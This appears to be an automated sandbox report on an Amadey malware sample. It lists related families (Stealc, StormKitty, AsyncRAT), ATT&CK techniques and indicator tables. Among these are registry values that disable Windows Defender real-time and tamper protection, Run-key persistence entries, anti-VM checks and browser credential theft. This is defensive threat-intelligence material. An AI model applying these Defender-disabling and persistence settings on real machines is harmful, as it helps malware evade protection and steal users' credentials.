amadey | c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	a2c29246b7.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	4R840N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	4R840N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	4R840N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	4R840N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	4R840N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	a2c29246b7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	4R840N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	a2c29246b7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	a2c29246b7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	a2c29246b7.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/4664-157-0x00000000093D0000-0x00000000094F2000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4732 created 4188	4732	powershell.exe	98

Async RAT payload 3 IoCs

rat

resource	yara_rule
behavioral1/memory/4664-96-0x00000000007F0000-0x0000000000C52000-memory.dmp	family_asyncrat
behavioral1/memory/4664-97-0x00000000007F0000-0x0000000000C52000-memory.dmp	family_asyncrat
behavioral1/memory/4664-230-0x00000000007F0000-0x0000000000C52000-memory.dmp	family_asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9521c8ff45.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a2c29246b7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2l0932.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4R840N.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1395d34d32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	51e04a8ac8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1E05b7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3C22x.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	H3tyh96.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 26 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1E05b7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3C22x.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4R840N.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	51e04a8ac8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1E05b7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3C22x.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	H3tyh96.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a2c29246b7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2l0932.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1395d34d32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9521c8ff45.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	51e04a8ac8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a2c29246b7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4R840N.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	H3tyh96.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1395d34d32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9521c8ff45.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2l0932.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	HyperServerFontdll.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	1E05b7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	H3tyh96.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	UkYEOVR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 20 IoCs

pid	Process
3616	p4Y09.exe
3968	L9O32.exe
3184	1E05b7.exe
1444	skotes.exe
2840	2l0932.exe
4076	3C22x.exe
2212	4R840N.exe
3428	skotes.exe
2848	Z9Pp9pM.exe
4664	H3tyh96.exe
4332	1395d34d32.exe
4448	UkYEOVR.exe
4700	9521c8ff45.exe
4408	HyperServerFontdll.exe
1088	51e04a8ac8.exe
3200	0d6f1088ef.exe
5140	dllhost.exe
5916	a2c29246b7.exe
5940	skotes.exe
6956	skotes.exe

Identifies Wine through registry keys 2 TTPs 13 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	2l0932.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	4R840N.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	H3tyh96.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	1395d34d32.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	51e04a8ac8.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	a2c29246b7.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	1E05b7.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	3C22x.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	9521c8ff45.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	skotes.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	4R840N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	4R840N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	a2c29246b7.exe

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\51e04a8ac8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013727001\\51e04a8ac8.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0d6f1088ef.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013728001\\0d6f1088ef.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a2c29246b7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013729001\\a2c29246b7.exe"	skotes.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	p4Y09.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	L9O32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9521c8ff45.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013726001\\9521c8ff45.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
752	powershell.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0009000000023bfc-357.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

pid	Process
3184	1E05b7.exe
1444	skotes.exe
2840	2l0932.exe
4076	3C22x.exe
2212	4R840N.exe
3428	skotes.exe
4664	H3tyh96.exe
4332	1395d34d32.exe
4700	9521c8ff45.exe
1088	51e04a8ac8.exe
5916	a2c29246b7.exe
5940	skotes.exe
6956	skotes.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Portable Devices\27d1bcfc3c54e0	HyperServerFontdll.exe
File created	C:\Program Files (x86)\Windows Media Player\skotes.exe	HyperServerFontdll.exe
File created	C:\Program Files (x86)\Windows Media Player\4aac827b709113	HyperServerFontdll.exe
File created	C:\Program Files (x86)\Windows Portable Devices\System.exe	HyperServerFontdll.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	1E05b7.exe

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4892	sc.exe
3200	sc.exe
2036	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4980	4664	WerFault.exe	100
6300	4332	WerFault.exe	107

System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0d6f1088ef.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2l0932.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	0d6f1088ef.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a2c29246b7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	L9O32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	H3tyh96.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	51e04a8ac8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4R840N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1395d34d32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	0d6f1088ef.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UkYEOVR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	p4Y09.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1E05b7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Z9Pp9pM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3C22x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9521c8ff45.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whoami.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whoami.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4272	PING.EXE

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
3464	taskkill.exe
2560	taskkill.exe
4424	taskkill.exe
4144	taskkill.exe
3412	taskkill.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	UkYEOVR.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	HyperServerFontdll.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	firefox.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

pid	Process
4144	reg.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4272	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3184	1E05b7.exe
3184	1E05b7.exe
1444	skotes.exe
1444	skotes.exe
2840	2l0932.exe
2840	2l0932.exe
4076	3C22x.exe
4076	3C22x.exe
2212	4R840N.exe
2212	4R840N.exe
3428	skotes.exe
3428	skotes.exe
2212	4R840N.exe
2212	4R840N.exe
4664	H3tyh96.exe
4664	H3tyh96.exe
4664	H3tyh96.exe
4664	H3tyh96.exe
4332	1395d34d32.exe
4332	1395d34d32.exe
4664	H3tyh96.exe
4732	powershell.exe
4732	powershell.exe
4700	9521c8ff45.exe
4700	9521c8ff45.exe
4732	powershell.exe
4732	powershell.exe
752	powershell.exe
752	powershell.exe
752	powershell.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe
4408	HyperServerFontdll.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

description	pid	Process
Token: SeDebugPrivilege	2212	4R840N.exe
Token: SeDebugPrivilege	4664	H3tyh96.exe
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
Token: SeDebugPrivilege	1728	whoami.exe
